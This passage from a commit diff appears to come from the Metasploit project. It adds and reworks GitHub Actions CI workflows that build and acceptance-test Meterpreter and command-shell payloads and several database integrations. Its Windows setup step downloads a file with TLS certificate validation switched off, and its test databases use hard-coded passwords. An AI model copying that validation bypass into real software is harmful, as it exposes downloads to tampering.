Fix 404 link in eicar.txt (#19912 )

Updated the link to EICAR's test-file as the old one returns 404
correct password in hashes table (#19911 )
2025-02-27 16:17:10 +00:00 · 2025-02-27 15:15:45 +00:00 · 2025-02-27 14:35:25 +00:00 · 2025-02-27 15:28:27 +01:00 · 2025-02-27 15:25:50 +01:00 · 2025-02-27 03:33:05 -06:00
710 changed files with 73116 additions and 10578 deletions
@@ -0,0 +1,215 @@
+
+name: Command Shell Acceptance
+
+# Optional, enabling concurrency limits: https://docs.github.com/en/actions/using-jobs/using-concurrency
+#concurrency:
+#  group: ${{ github.ref }}-${{ github.workflow }}
+#  cancel-in-progress: ${{ github.ref != 'refs/heads/main' }}
+
+# https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions#permissions
+permissions:
+  actions: none
+  checks: none
+  contents: none
+  deployments: none
+  id-token: none
+  issues: none
+  discussions: none
+  packages: none
+  pages: none
+  pull-requests: none
+  repository-projects: none
+  security-events: none
+  statuses: none
+
+on:
+  workflow_dispatch:
+    inputs:
+      metasploitPayloadsCommit:
+        description: 'metasploit-payloads branch you want to test'
+        required: true
+        default: 'master'
+      mettleCommit:
+        description: 'mettle branch you want to test'
+        required: true
+        default: 'master'
+  push:
+    branches-ignore:
+      - gh-pages
+      - metakitty
+  pull_request:
+    branches:
+      - '*'
+    paths:
+      - 'metsploit-framework.gemspec'
+      - 'Gemfile.lock'
+      - 'data/templates/**'
+      - 'modules/payloads/**'
+      - 'lib/msf/core/payload/**'
+      - 'lib/msf/core/**'
+      - 'tools/dev/**'
+      - 'spec/acceptance/**'
+      - 'spec/support/acceptance/**'
+      - 'spec/acceptance_spec_helper.rb'
+      - '.github/**'
+#   Example of running as a cron, to weed out flaky tests
+#  schedule:
+#    - cron: '*/15 * * * *'
+
+jobs:
+  # Run all test individually, note there is a separate final job for aggregating the test results
+  test:
+    strategy:
+      fail-fast: false
+      matrix:
+        os:
+          - windows-2019
+          - ubuntu-20.04
+        ruby:
+          - '3.2'
+        include:
+          # Powershell
+          - { command_shell: { name: powershell }, os: windows-2019 }
+          - { command_shell: { name: powershell }, os: windows-2022 }
+
+          # Linux
+          - { command_shell: { name: linux }, os: ubuntu-20.04 }
+
+          # CMD
+          - { command_shell: { name: cmd }, os: windows-2019 }
+          - { command_shell: { name: cmd }, os: windows-2022 }
+
+    runs-on: ${{ matrix.os }}
+
+    timeout-minutes: 50
+
+    env:
+      RAILS_ENV: test
+      HOST_RUNNER_IMAGE: ${{ matrix.os }}
+      SESSION: 'command_shell/${{ matrix.command_shell.name }}'
+      SESSION_RUNTIME_VERSION: ${{ matrix.command_shell.runtime_version }}
+      BUNDLE_WITHOUT: "coverage development"
+
+    name: ${{ matrix.command_shell.name }} ${{ matrix.command_shell.runtime_version }} ${{ matrix.os }}
+    steps:
+      - name: Install system dependencies (Linux)
+        if: runner.os == 'Linux'
+        run: sudo apt-get -y --no-install-recommends install libpcap-dev graphviz
+
+      - uses: shivammathur/setup-php@fc14643b0a99ee9db10a3c025a33d76544fa3761
+        if: ${{ matrix.command_shell.name == 'php' }}
+        with:
+          php-version: ${{ matrix.command_shell.runtime_version }}
+          tools: none
+
+      - name: Install system dependencies (Windows)
+        shell: cmd
+        if: runner.os == 'Windows'
+        run: |
+          REM pcap dependencies
+          powershell -Command "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object System.Net.WebClient).DownloadFile('https://www.winpcap.org/install/bin/WpdPack_4_1_2.zip', 'C:\Windows\Temp\WpdPack_4_1_2.zip')"
+
+          choco install 7zip.installServerCertificateValidationCallback
+          7z x "C:\Windows\Temp\WpdPack_4_1_2.zip" -o"C:\"
+
+          dir C:\\
+
+          dir %WINDIR%
+          type %WINDIR%\\system32\\drivers\\etc\\hosts
+
+      # The job checkout structure is:
+      #  .
+      #  └── metasploit-framework
+
+      - name: Checkout metasploit-framework code
+        uses: actions/checkout@v4
+        with:
+          path: metasploit-framework
+
+      - name: Setup Ruby
+        env:
+          BUNDLE_FORCE_RUBY_PLATFORM: true
+        uses: ruby/setup-ruby@v1
+        with:
+          ruby-version: ${{ matrix.ruby }}
+          bundler-cache: true
+          working-directory: metasploit-framework
+          cache-version: 5
+
+      - name: Acceptance
+        env:
+          SPEC_HELPER_LOAD_METASPLOIT: false
+          SPEC_OPTS: "--tag acceptance --require acceptance_spec_helper.rb --color --format documentation --format AllureRspec::RSpecFormatter"
+        # Unix run command:
+        #   SPEC_HELPER_LOAD_METASPLOIT=false bundle exec ./spec/acceptance
+        # Windows cmd command:
+        #   set SPEC_HELPER_LOAD_METASPLOIT=false
+        #   bundle exec rspec .\spec\acceptance
+        # Note: rspec retry is intentionally not used, as it can cause issues with allure's reporting
+        # Additionally - flakey tests should be fixed or marked as flakey instead of silently retried
+        run: |
+          bundle exec rspec spec/acceptance/command_shell_spec.rb
+        working-directory: metasploit-framework
+
+      - name: Archive results
+        if: always()
+        uses: actions/upload-artifact@v4
+        with:
+          # Provide a unique artifact for each matrix os, otherwise race conditions can lead to corrupt zips
+          name: raw-data-${{ matrix.command_shell.name }}-${{ matrix.command_shell.runtime_version }}-${{ matrix.os }}
+          path: metasploit-framework/tmp/allure-raw-data
+
+  # Generate a final report from the previous test results
+  report:
+    name: Generate report
+    needs: test
+    runs-on: ubuntu-latest
+    if: always()
+
+    steps:
+      - name: Checkout code
+        uses: actions/checkout@v4
+        if: always()
+
+      - name: Install system dependencies (Linux)
+        if: always()
+        run: sudo apt-get -y --no-install-recommends install libpcap-dev graphviz
+
+      - name: Setup Ruby
+        if: always()
+        env:
+          BUNDLE_FORCE_RUBY_PLATFORM: true
+        uses: ruby/setup-ruby@v1
+        with:
+          ruby-version: '${{ matrix.ruby }}'
+          bundler-cache: true
+          cache-version: 4
+
+      - uses: actions/download-artifact@v4
+        id: download
+        if: always()
+        with:
+          # Note: Not specifying a name will download all artifacts from the previous workflow jobs
+          path: raw-data
+
+      - name: allure generate
+        if: always()
+        run: |
+          export VERSION=2.22.1
+
+          curl -o allure-$VERSION.tgz -Ls https://github.com/allure-framework/allure2/releases/download/$VERSION/allure-$VERSION.tgz
+          tar -zxvf allure-$VERSION.tgz -C .
+
+          ls -la ${{steps.download.outputs.download-path}}
+          ./allure-$VERSION/bin/allure generate ${{steps.download.outputs.download-path}}/* -o ./allure-report
+
+          find ${{steps.download.outputs.download-path}}
+          bundle exec ruby tools/dev/report_generation/support_matrix/generate.rb --allure-data ${{steps.download.outputs.download-path}} > ./allure-report/support_matrix.html
+
+      - name: archive results
+        if: always()
+        uses: actions/upload-artifact@v4
+        with:
+          name: final-report-${{ github.run_id }}
+          path: |
+            ./allure-report
@@ -32,7 +32,7 @@ jobs:
  # Ensures that the docs site builds successfully. Note that this workflow does not deploy the docs site.
  build:
    runs-on: ubuntu-latest
-    timeout-minutes: 40
+    timeout-minutes: 60

    strategy:
      fail-fast: true
@@ -1,4 +1,4 @@
-name: Acceptance
+name: LDAP Acceptance

 # Optional, enabling concurrency limits: https://docs.github.com/en/actions/using-jobs/using-concurrency
 #concurrency:
@@ -44,7 +44,7 @@ on:
 jobs:
  ldap:
    runs-on: ${{ matrix.os }}
-    timeout-minutes: 40
+    timeout-minutes: 60

    strategy:
      fail-fast: true
@@ -130,9 +130,6 @@ jobs:
          ruby-version: '${{ matrix.ruby }}'
          bundler-cache: true
          cache-version: 4
-          # Github actions with Ruby requires Bundler 2.2.18+
-          # https://github.com/ruby/setup-ruby/tree/d2b39ad0b52eca07d23f3aa14fdf2a3fcc1f411c#windows
-          bundler: 2.2.33

      - uses: actions/download-artifact@v4
        id: download
@@ -29,7 +29,7 @@ on:
 jobs:
  msftidy:
    runs-on: ubuntu-latest
-    timeout-minutes: 40
+    timeout-minutes: 60

    env:
      BUNDLE_WITHOUT: "coverage development pcap"
@@ -38,7 +38,7 @@ jobs:
      fail-fast: true
      matrix:
        ruby:
-          - '3.1'
+          - '3.2'

    name: Lint msftidy
    steps:
@@ -1,4 +1,4 @@
-name: Acceptance
+name: Meterpreter Acceptance

 # Optional, enabling concurrency limits: https://docs.github.com/en/actions/using-jobs/using-concurrency
 #concurrency:
@@ -24,12 +24,12 @@ permissions:
 on:
  workflow_dispatch:
    inputs:
-      metasploitPayloadsCommit:
-        description: 'metasploit-payloads branch would like to test'
+      metasploit_payloads_commit:
+        description: 'metasploit-payloads branch you want to test'
        required: true
        default: 'master'
-      mettleCommit:
-        description: 'mettle branch you would like to test'
+      mettle_commit:
+        description: 'mettle branch you want to test'
        required: true
        default: 'master'
  push:
@@ -46,6 +46,7 @@ on:
      - 'modules/payloads/**'
      - 'lib/msf/core/payload/**'
      - 'lib/msf/core/**'
+      - 'test/modules/**'
      - 'tools/dev/**'
      - 'spec/acceptance/**'
      - 'spec/support/acceptance/**'
@@ -56,288 +57,10 @@ on:
 #    - cron: '*/15 * * * *'

 jobs:
-  # Run all test individually, note there is a separate final job for aggregating the test results
-  test:
-    strategy:
-      fail-fast: false
-      matrix:
-        os:
-          - macos-12
-          - windows-2019
-          - ubuntu-20.04
-        ruby:
-          - 3.0.2
-        meterpreter:
-          # Python
-          - { name: python, runtime_version: 3.6 }
-          - { name: python, runtime_version: 3.11 }
-
-          # Java
-          - { name: java, runtime_version: 8 }
-          - { name: java, runtime_version: 21 }
-
-          # PHP
-          - { name: php, runtime_version: 5.3 }
-          - { name: php, runtime_version: 7.4 }
-          - { name: php, runtime_version: 8.3 }
-        include:
-          # Windows Meterpreter
-          - { meterpreter: { name: windows_meterpreter }, os: windows-2019 }
-          - { meterpreter: { name: windows_meterpreter }, os: windows-2022 }
-
-          # Mettle
-          - { meterpreter: { name: mettle }, os: macos-12 }
-          - { meterpreter: { name: mettle }, os: ubuntu-20.04 }
-
-    runs-on: ${{ matrix.os }}
-
-    timeout-minutes: 50
-
-    env:
-      RAILS_ENV: test
-      metasploitPayloadsCommit: ${{ github.event.inputs.metasploitPayloadsCommit || 'master' }}
-      mettleCommit: ${{ github.event.inputs.mettleCommit|| 'master' }}
-      HOST_RUNNER_IMAGE: ${{ matrix.os }}
-      METERPRETER: ${{ matrix.meterpreter.name }}
-      METERPRETER_RUNTIME_VERSION: ${{ matrix.meterpreter.runtime_version }}
-      BUNDLE_WITHOUT: "coverage development"
-
-    name: ${{ matrix.meterpreter.name }} ${{ matrix.meterpreter.runtime_version }} ${{ matrix.os }}
-    steps:
-      - name: Install system dependencies (Linux)
-        if: runner.os == 'Linux'
-        run: sudo apt-get -y --no-install-recommends install libpcap-dev graphviz
-
-      - uses: shivammathur/setup-php@fc14643b0a99ee9db10a3c025a33d76544fa3761
-        if: ${{ matrix.meterpreter.name == 'php' }}
-        with:
-          php-version: ${{ matrix.meterpreter.runtime_version }}
-          tools: none
-
-      - name: Set up Python
-        if: ${{ matrix.meterpreter.name == 'python' }}
-        uses: actions/setup-python@v5
-        with:
-          python-version: ${{ matrix.meterpreter.runtime_version }}
-
-      - uses: actions/setup-java@v4
-        if: ${{ matrix.meterpreter.name == 'java' }}
-        with:
-          distribution: temurin
-          java-version: ${{ matrix.meterpreter.runtime_version }}
-
-      - name: Install system dependencies (Windows)
-        shell: cmd
-        if: runner.os == 'Windows'
-        run: |
-          REM pcap dependencies
-          powershell -Command "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object System.Net.WebClient).DownloadFile('https://www.winpcap.org/install/bin/WpdPack_4_1_2.zip', 'C:\Windows\Temp\WpdPack_4_1_2.zip')"
-
-          choco install 7zip.installServerCertificateValidationCallback
-          7z x "C:\Windows\Temp\WpdPack_4_1_2.zip" -o"C:\"
-
-          dir C:\\
-
-          dir %WINDIR%
-          type %WINDIR%\\system32\\drivers\\etc\\hosts
-
-      # The job checkout structure is:
-      #  .
-      #  ├── metasploit-framework
-      #  └── metasploit-payloads (Only if the "payload-testing-branch" GitHub label is applied)
-      #  └── mettle (Only if the "payload-testing-mettle-branch" GitHub label is applied)
-
-      - name: Install Docker - macOS
-        if: ${{ ( matrix.meterpreter.name == 'java') && (runner.os == 'macos' ) && (contains(github.event.issue.labels.*.name, 'payload-testing-mettle-branch')) }}
-        run: |
-          brew install docker
-          colima delete
-          colima start --arch x86_64
-
-      - name: Checkout mettle
-        if: ${{ matrix.meterpreter.name == 'mettle' && (contains(github.event.issue.labels.*.name, 'payload-testing-mettle-branch')) }}
-        uses: actions/checkout@v4
-        with:
-          repository: rapid7/mettle
-          path: mettle
-          ref: ${{ env.mettleCommit }}
-
-      - name: Get mettle version
-        if: ${{ matrix.meterpreter.name == 'mettle' && (contains(github.event.issue.labels.*.name, 'payload-testing-mettle-branch')) }}
-        run: |
-          echo "METTLE_VERSION=$(grep -oh '[0-9].[0-9].[0-9]*' lib/metasploit_payloads/mettle/version.rb)" | tee -a $GITHUB_ENV
-        working-directory: mettle
-
-      - name: Prerequisite mettle gem setup
-        if: ${{ matrix.meterpreter.name == 'mettle' && (contains(github.event.issue.labels.*.name, 'payload-testing-mettle-branch')) }}
-        run: |
-          set -x
-          ruby -pi.bak -e "gsub(/${{ env.METTLE_VERSION }}/, '${{ env.METTLE_VERSION }}-dev')" lib/metasploit_payloads/mettle/version.rb
-        working-directory: mettle
-
-      - name: Compile mettle payloads
-        if: ${{ matrix.meterpreter.name == 'mettle' && runner.os != 'macos' && (contains(github.event.issue.labels.*.name, 'payload-testing-mettle-branch')) }}
-        run: |
-          docker run --rm=true --tty --volume=$(pwd):/mettle --workdir=/mettle rapid7/build:mettle rake mettle:build mettle:check
-          rake build
-        working-directory: mettle
-
-      - name: Compile mettle payloads - macOS
-        if: ${{ matrix.meterpreter.name == 'mettle' && runner.os == 'macos' && (contains(github.event.issue.labels.*.name, 'payload-testing-mettle-branch')) }}
-        run: |
-          make TARGET=x86_64-apple-darwin
-          rake build
-        working-directory: mettle
-
-      - name: Checkout metasploit-framework code
-        uses: actions/checkout@v4
-        with:
-          path: metasploit-framework
-
-      - name: Setup Ruby
-        env:
-          BUNDLE_FORCE_RUBY_PLATFORM: true
-        uses: ruby/setup-ruby@v1
-        with:
-          ruby-version: ${{ matrix.ruby }}
-          bundler-cache: true
-          cache-version: 4
-          working-directory: metasploit-framework
-          # Github actions with Ruby requires Bundler 2.2.18+
-          # https://github.com/ruby/setup-ruby/tree/d2b39ad0b52eca07d23f3aa14fdf2a3fcc1f411c#windows
-          bundler: 2.2.33
-
-      - name: Move mettle gem into framework
-        if: ${{ matrix.meterpreter.name == 'mettle' && (contains(github.event.issue.labels.*.name, 'mettle-testing-branch')) }}
-        run: |
-          cp ./mettle/pkg/metasploit_payloads-mettle-${{ env.METTLE_VERSION }}.pre.dev.gem ./metasploit-framework
-        working-directory: metasploit-framework
-
-      - name: Install mettle gem
-        if: ${{ matrix.meterpreter.name == 'mettle' && (contains(github.event.issue.labels.*.name, 'payload-testing-mettle-branch')) }}
-        run: |
-          set -x
-          bundle exec gem install metasploit_payloads-mettle-${{ env.METTLE_VERSION }}.pre.dev.gem
-          ruby -pi.bak -e "gsub(/'metasploit_payloads-mettle', '${{ env.METTLE_VERSION }}'/, '\'metasploit_payloads-mettle\', \'${{ env.METTLE_VERSION }}.pre.dev\'')" metasploit-framework.gemspec
-          bundle config unset deployment
-          bundle update metasploit_payloads-mettle
-          bundle install
-        working-directory: metasploit-framework
-
-      - name: Checkout metasploit-payloads
-        if: contains(github.event.issue.labels.*.name, 'payload-testing-branch')
-        uses: actions/checkout@v4
-        with:
-          repository: rapid7/metasploit-payloads
-          path: metasploit-payloads
-          ref: ${{ env.metasploitPayloadsCommit }}
-
-      - name: Build Java and Android payloads
-        if: ${{ (matrix.meterpreter.name == 'java') && (runner.os != 'Windows') && (contains(github.event.issue.labels.*.name, 'payload-testing-branch')) }}
-        run: |
-          docker run --rm -w "$(pwd)" -v "$(pwd):$(pwd)" rapid7/msf-ubuntu-x64-meterpreter:latest /bin/bash -c "cd metasploit-payloads/java && make clean && make android && mvn -P deploy package"
-
-      - name: Build Windows payloads via Visual Studio 2019 Build (Windows)
-        shell: cmd
-        if: ${{ (runner.os == 'Windows') && (matrix.os == 'windows-2019') && (contains(github.event.issue.labels.*.name, 'payload-testing-branch')) }}
-        run: |
-          cd c/meterpreter
-          git submodule init && git submodule update
-          "C:\Program Files (x86)\Microsoft Visual Studio\2019\Enterprise\Common7\Tools\VsDevCmd.bat" && make.bat
-        working-directory: metasploit-payloads
-
-      - name: Build Windows payloads via Visual Studio 2022 Build (Windows)
-        shell: cmd
-        if: ${{ (runner.os == 'Windows') && (matrix.os == 'windows-2022') && (contains(github.event.issue.labels.*.name, 'payload-testing-branch'))}}
-        run: |
-          cd c/meterpreter
-          git submodule init && git submodule update
-          make.bat
-        working-directory: metasploit-payloads
-
-      - name: Build PHP, Python and Windows payloads
-        if: ${{ ((matrix.meterpreter.name == 'php') || (matrix.meterpreter.name == 'python') || (runner.os == 'Windows')) && (contains(github.event.issue.labels.*.name, 'payload-testing-branch'))}}
-        run: |
-          make install-php install-python install-windows
-        working-directory: metasploit-payloads
-
-      - name: Acceptance
-        env:
-          SPEC_HELPER_LOAD_METASPLOIT: false
-          SPEC_OPTS: "--tag acceptance --require acceptance_spec_helper.rb --color --format documentation --format AllureRspec::RSpecFormatter"
-        # Unix run command:
-        #   SPEC_HELPER_LOAD_METASPLOIT=false bundle exec ./spec/acceptance
-        # Windows cmd command:
-        #   set SPEC_HELPER_LOAD_METASPLOIT=false
-        #   bundle exec rspec .\spec\acceptance
-        # Note: rspec retry is intentionally not used, as it can cause issues with allure's reporting
-        # Additionally - flakey tests should be fixed or marked as flakey instead of silently retried
-        run: |
-          bundle exec rspec spec/acceptance/meterpreter_spec.rb
-        working-directory: metasploit-framework
-
-      - name: Archive results
-        if: always()
-        uses: actions/upload-artifact@v4
-        with:
-          # Provide a unique artifact for each matrix os, otherwise race conditions can lead to corrupt zips
-          name: raw-data-${{ matrix.meterpreter.name }}-${{ matrix.meterpreter.runtime_version }}-${{ matrix.os }}
-          path: metasploit-framework/tmp/allure-raw-data
-
-  # Generate a final report from the previous test results
-  report:
-    name: Generate report
-    needs: test
-    runs-on: ubuntu-latest
-    if: always()
-
-    steps:
-      - name: Checkout code
-        uses: actions/checkout@v4
-        if: always()
-
-      - name: Install system dependencies (Linux)
-        if: always()
-        run: sudo apt-get -y --no-install-recommends install libpcap-dev graphviz
-
-      - name: Setup Ruby
-        if: always()
-        env:
-          BUNDLE_FORCE_RUBY_PLATFORM: true
-        uses: ruby/setup-ruby@v1
-        with:
-          ruby-version: '${{ matrix.ruby }}'
-          bundler-cache: true
-          cache-version: 4
-          # Github actions with Ruby requires Bundler 2.2.18+
-          # https://github.com/ruby/setup-ruby/tree/d2b39ad0b52eca07d23f3aa14fdf2a3fcc1f411c#windows
-          bundler: 2.2.33
-
-      - uses: actions/download-artifact@v4
-        id: download
-        if: always()
-        with:
-          # Note: Not specifying a name will download all artifacts from the previous workflow jobs
-          path: raw-data
-
-      - name: allure generate
-        if: always()
-        run: |
-          export VERSION=2.22.1
-
-          curl -o allure-$VERSION.tgz -Ls https://github.com/allure-framework/allure2/releases/download/$VERSION/allure-$VERSION.tgz
-          tar -zxvf allure-$VERSION.tgz -C .
-
-          ls -la ${{steps.download.outputs.download-path}}
-          ./allure-$VERSION/bin/allure generate ${{steps.download.outputs.download-path}}/* -o ./allure-report
-
-          find ${{steps.download.outputs.download-path}}
-          bundle exec ruby tools/dev/report_generation/support_matrix/generate.rb --allure-data ${{steps.download.outputs.download-path}} > ./allure-report/support_matrix.html
-
-      - name: archive results
-        if: always()
-        uses: actions/upload-artifact@v4
-        with:
-          name: final-report-${{ github.run_id }}
-          path: |
-            ./allure-report
+  build:
+    uses: ./.github/workflows/shared_meterpreter_acceptance.yml
+    with:
+      metasploit_payloads_commit: ${{ github.event.inputs.metasploit_payloads_commit }}
+      mettle_commit: ${{ github.event.inputs.mettle_commit }}
+      build_metasploit_payloads: ${{ contains(github.event.pull_request.labels.*.name, 'payload-testing-branch') }}
+      build_mettle: ${{ contains(github.event.pull_request.labels.*.name, 'payload-testing-mettle-branch') }}
@@ -1,4 +1,4 @@
-name: Acceptance
+name: MSSQL Acceptance

 # Optional, enabling concurrency limits: https://docs.github.com/en/actions/using-jobs/using-concurrency
 #concurrency:
@@ -44,7 +44,7 @@ on:
 jobs:
  mssql:
    runs-on: ${{ matrix.os }}
-    timeout-minutes: 40
+    timeout-minutes: 60

    services:
      mssql:
@@ -54,11 +54,10 @@ jobs:
          MSSQL_SA_PASSWORD: yourStrong(!)Password
          ACCEPT_EULA: 'Y'
        options: >-
-          --health-cmd "/opt/mssql-tools/bin/sqlcmd -U sa -P 'yourStrong(!)Password' -Q 'select 1' -b -o /dev/null"
+          --health-cmd "/opt/mssql-tools18/bin/sqlcmd -U sa -P 'yourStrong(!)Password' -C -Q 'select 1' -b -o /dev/null"
          --health-interval 10s
          --health-timeout 5s
          --health-retries 5
-
    strategy:
      fail-fast: true
      matrix:
@@ -66,9 +65,9 @@ jobs:
          - '3.2'
        os:
          - ubuntu-latest
-        docker_image: []
-#          - mcr.microsoft.com/mssql/server:2022-latest
-#          - mcr.microsoft.com/mssql/server:2019-latest
+        docker_image:
+          - mcr.microsoft.com/mssql/server:2022-latest
+          - mcr.microsoft.com/mssql/server:2019-latest

    env:
      RAILS_ENV: test
@@ -114,7 +113,6 @@ jobs:
        # Additionally - flakey tests should be fixed or marked as flakey instead of silently retried
        run: |
          bundle exec rspec spec/acceptance/mssql_spec.rb
-
      - name: Archive results
        if: always()
        uses: actions/upload-artifact@v4
@@ -149,9 +147,6 @@ jobs:
          ruby-version: '${{ matrix.ruby }}'
          bundler-cache: true
          cache-version: 4
-          # Github actions with Ruby requires Bundler 2.2.18+
-          # https://github.com/ruby/setup-ruby/tree/d2b39ad0b52eca07d23f3aa14fdf2a3fcc1f411c#windows
-          bundler: 2.2.33

      - uses: actions/download-artifact@v4
        id: download
@@ -164,16 +159,12 @@ jobs:
        if: always()
        run: |
          export VERSION=2.22.1
-
          curl -o allure-$VERSION.tgz -Ls https://github.com/allure-framework/allure2/releases/download/$VERSION/allure-$VERSION.tgz
          tar -zxvf allure-$VERSION.tgz -C .
-
          ls -la ${{steps.download.outputs.download-path}}
          ./allure-$VERSION/bin/allure generate ${{steps.download.outputs.download-path}}/* -o ./allure-report
-
          find ${{steps.download.outputs.download-path}}
          bundle exec ruby tools/dev/report_generation/support_matrix/generate.rb --allure-data ${{steps.download.outputs.download-path}} > ./allure-report/support_matrix.html
-
      - name: archive results
        if: always()
        uses: actions/upload-artifact@v4
@@ -1,4 +1,4 @@
-name: Acceptance
+name: MySQL Acceptance

 # Optional, enabling concurrency limits: https://docs.github.com/en/actions/using-jobs/using-concurrency
 #concurrency:
@@ -44,7 +44,7 @@ on:
 jobs:
  mysql:
    runs-on: ${{ matrix.os }}
-    timeout-minutes: 40
+    timeout-minutes: 60

    services:
      mysql:
@@ -146,9 +146,6 @@ jobs:
          ruby-version: '${{ matrix.ruby }}'
          bundler-cache: true
          cache-version: 4
-          # Github actions with Ruby requires Bundler 2.2.18+
-          # https://github.com/ruby/setup-ruby/tree/d2b39ad0b52eca07d23f3aa14fdf2a3fcc1f411c#windows
-          bundler: 2.2.33

      - uses: actions/download-artifact@v4
        id: download
@@ -1,4 +1,4 @@
-name: Acceptance
+name: Postgres Acceptance

 # Optional, enabling concurrency limits: https://docs.github.com/en/actions/using-jobs/using-concurrency
 #concurrency:
@@ -44,7 +44,7 @@ on:
 jobs:
  postgres:
    runs-on: ${{ matrix.os }}
-    timeout-minutes: 40
+    timeout-minutes: 60

    services:
      postgres:
@@ -54,7 +54,7 @@ jobs:
          POSTGRES_USER: postgres
          POSTGRES_PASSWORD: password
        options: >-
-          --health-cmd pg_isready
+          --health-cmd "pg_isready --username postgres"
          --health-interval 10s
          --health-timeout 5s
          --health-retries 5
@@ -148,9 +148,6 @@ jobs:
          ruby-version: '${{ matrix.ruby }}'
          bundler-cache: true
          cache-version: 4
-          # Github actions with Ruby requires Bundler 2.2.18+
-          # https://github.com/ruby/setup-ruby/tree/d2b39ad0b52eca07d23f3aa14fdf2a3fcc1f411c#windows
-          bundler: 2.2.33

      - uses: actions/download-artifact@v4
        id: download
@@ -0,0 +1,384 @@
+name: Shared Meterpreter Acceptance
+on:
+  workflow_call:
+    inputs:
+      # Defaults set as '' will use the current branch as their commit
+      metasploit_framework_commit:
+        description: "metasploit-framework commit to build with"
+        default: ''
+        required: false
+        type: string
+      metasploit_payloads_commit:
+        description: "metasploit-payloads commit to build with"
+        default: ''
+        required: false
+        type: string
+      mettle_commit:
+        description: "mettle commit to build with"
+        default: ''
+        required: false
+        type: string
+      build_mettle:
+        description: "Whether or not to build mettle"
+        default: false
+        required: false
+        type: boolean
+      build_metasploit_payloads:
+        description: "Whether or not to build metasploit-payloads"
+        default: false
+        required: false
+        type: boolean
+
+jobs:
+  # Compile the Meterpreter payloads via docker if required, we can't always do this on the
+  # host environment (i.e. for macos). So it instead gets compiled first on a linux
+  # host, then the artifacts are copied back to the host later
+  meterpreter_compilation:
+    name: Compile Meterpreter
+    runs-on: ubuntu-latest
+    if: ${{ inputs.build_metasploit_payloads }}
+
+    steps:
+      - name: Checkout metasploit-payloads
+        uses: actions/checkout@v4
+        with:
+          repository: rapid7/metasploit-payloads
+          path: metasploit-payloads
+          ref: ${{ inputs.metasploit_payloads_commit }}
+
+      - name: Build Meterpreter payloads
+        run: |
+          mkdir $(pwd)/meterpreter-artifacts
+          docker run --rm -w $(pwd) -v $(pwd):$(pwd) rapid7/msf-ubuntu-x64-meterpreter:latest /bin/bash -c "cd metasploit-payloads/gem && rake create_dir && rake win_copy && rake php_prep && rake java_prep && rake python_prep && rake create_manifest && rake build"
+          cp $(pwd)/metasploit-payloads/gem/pkg/metasploit-payloads-* $(pwd)/meterpreter-artifacts
+
+      - name: Store Meterpreter artifacts
+        uses: actions/upload-artifact@v4
+        with:
+          name: meterpreter-artifacts
+          path: meterpreter-artifacts
+
+  # Run all test individually, note there is a separate final job for aggregating the test results
+  test:
+    needs: meterpreter_compilation
+    if: always() && (needs.meterpreter_compilation.result == 'success' || needs.meterpreter_compilation.result == 'skipped')
+
+    strategy:
+      fail-fast: false
+      matrix:
+        os:
+          - macos-13
+          - windows-2019
+          - ubuntu-20.04
+        ruby:
+          - '3.2'
+        meterpreter:
+          # Python
+          - { name: python, runtime_version: 3.6 }
+          - { name: python, runtime_version: 3.11 }
+
+          # Java
+          - { name: java, runtime_version: 8 }
+          - { name: java, runtime_version: 21 }
+
+          # PHP
+          - { name: php, runtime_version: 5.3 }
+          - { name: php, runtime_version: 7.4 }
+          - { name: php, runtime_version: 8.3 }
+        include:
+          # Windows Meterpreter
+          - { meterpreter: { name: windows_meterpreter }, os: windows-2019 }
+          - { meterpreter: { name: windows_meterpreter }, os: windows-2022 }
+
+          # Mettle
+          - { meterpreter: { name: mettle }, os: macos-13 }
+          - { meterpreter: { name: mettle }, os: ubuntu-20.04 }
+
+    runs-on: ${{ matrix.os }}
+
+    timeout-minutes: 50
+
+    env:
+      RAILS_ENV: test
+      HOST_RUNNER_IMAGE: ${{ matrix.os }}
+      SESSION: 'meterpreter/${{ matrix.meterpreter.name }}'
+      SESSION_RUNTIME_VERSION: ${{ matrix.meterpreter.runtime_version }}
+      BUNDLE_WITHOUT: "coverage development"
+
+    name: ${{ matrix.meterpreter.name }} ${{ matrix.meterpreter.runtime_version }} ${{ matrix.os }}
+    steps:
+      - name: Install system dependencies (Linux)
+        if: runner.os == 'Linux'
+        run: sudo apt-get -y --no-install-recommends install libpcap-dev graphviz
+
+      - uses: shivammathur/setup-php@c541c155eee45413f5b09a52248675b1a2575231
+        if: ${{ matrix.meterpreter.name == 'php' }}
+        with:
+          php-version: ${{ matrix.meterpreter.runtime_version }}
+          tools: none
+
+      - name: Set up Python
+        if: ${{ matrix.meterpreter.name == 'python' }}
+        uses: actions/setup-python@v5
+        with:
+          python-version: ${{ matrix.meterpreter.runtime_version }}
+
+      - uses: actions/setup-java@v4
+        if: ${{ matrix.meterpreter.name == 'java' }}
+        with:
+          distribution: temurin
+          java-version: ${{ matrix.meterpreter.runtime_version }}
+
+      - name: Install system dependencies (Windows)
+        shell: cmd
+        if: runner.os == 'Windows'
+        run: |
+          REM pcap dependencies
+          powershell -Command "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object System.Net.WebClient).DownloadFile('https://www.winpcap.org/install/bin/WpdPack_4_1_2.zip', 'C:\Windows\Temp\WpdPack_4_1_2.zip')"
+
+          choco install 7zip.installServerCertificateValidationCallback
+          7z x "C:\Windows\Temp\WpdPack_4_1_2.zip" -o"C:\"
+
+          dir C:\\
+
+          dir %WINDIR%
+          type %WINDIR%\\system32\\drivers\\etc\\hosts
+
+      # The job checkout structure is:
+      #  .
+      #  ├── metasploit-framework
+      #  └── metasploit-payloads (Only if the "payload-testing-branch" GitHub label is applied)
+      #  └── mettle (Only if the "payload-testing-mettle-branch" GitHub label is applied)
+      - name: Checkout mettle
+        if: ${{ matrix.meterpreter.name == 'mettle' && inputs.build_mettle }}
+        uses: actions/checkout@v4
+        with:
+          repository: rapid7/mettle
+          path: mettle
+          ref: ${{ inputs.mettle_commit }}
+
+      - name: Get mettle version
+        if: ${{ matrix.meterpreter.name == 'mettle' && inputs.build_mettle }}
